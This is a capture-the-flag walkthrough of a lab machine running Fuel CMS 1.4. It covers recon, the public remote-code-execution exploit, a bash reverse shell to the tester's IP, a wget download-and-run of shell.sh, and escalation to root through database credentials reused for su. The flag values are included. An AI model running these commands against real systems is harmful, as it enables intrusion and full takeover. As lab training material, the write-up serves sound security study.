Ignite

Room Info

Name

🔗 Ignite

Description

📝 A new start-up has a few issues with their web server.

Target IP

đŸŽ¯ 10.10.174.21

Recon

mkdir ignite
cd ignite
nmap -sV -sC -oA nmap_ignite 10.10.174.21
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry
|_/fuel/

📌 Found FUEL CMS v. 1.4 on port 80

Local Recon

Navigate to

  • http://10.10.174.21/

  • http://10.10.174.21/fuel

    • admin:admin

Exploitation

  • Search for a Fuel CMS exploit

searchsploit fuel cms
searchsploit -m 50477
less 50477.py

python 50477.py -u http://10.10.174.21

📌 Fuel CMS 1.4.1 - Remote Code Execution (3)

whoami

Reverse Shell

ip -br -c a
	10.18.65.48 # my IP
	
subl shell.sh

# Insert this line for a bash reverse shell
/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1
  • Setup a Python web server and a nc listener on 2 different tabs

python -m http.server

nc -nvlp 3333
  • Back in the exploited Fuel CMS Enter Command $

wget http://10.18.65.48:8000/shell.sh -O shell.sh
bash shell.sh
  • Reverse shell received in the nc terminal

/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
Reveal Flag - user.txt: 🚩

6470e394cbf6dab6a91682cc8585059b

Privilege Escalation

  • Enumerate Fuel CMS application

    • /var/www/html/fuel/application/config/

cat /var/www/html/fuel/application/config/database.php
$db['default'] = array(
	'dsn'	=> '',
	'hostname' => 'localhost',
	'username' => 'root',
	'password' => 'mememe',
	'database' => 'fuel_schema',
	'dbdriver' => 'mysqli',
	'dbprefix' => '',
	'pconnect' => FALSE,
	'db_debug' => (ENVIRONMENT !== 'production'),
	'cache_on' => FALSE,
	'cachedir' => '',
	'char_set' => 'utf8',
	'dbcollat' => 'utf8_general_ci',
	'swap_pre' => '',
	'encrypt' => FALSE,
	'compress' => FALSE,
	'stricton' => FALSE,
	'failover' => array(),
	'save_queries' => TRUE
);

📌 Found database credentials: root:mememe

  • Try to use those credentials for the root user of the system

su root

whoami
cd
cat root.txt
Reveal Flag - root.txt: 🚩

b9bbcb33e11b80be759c4e844862482


Last updated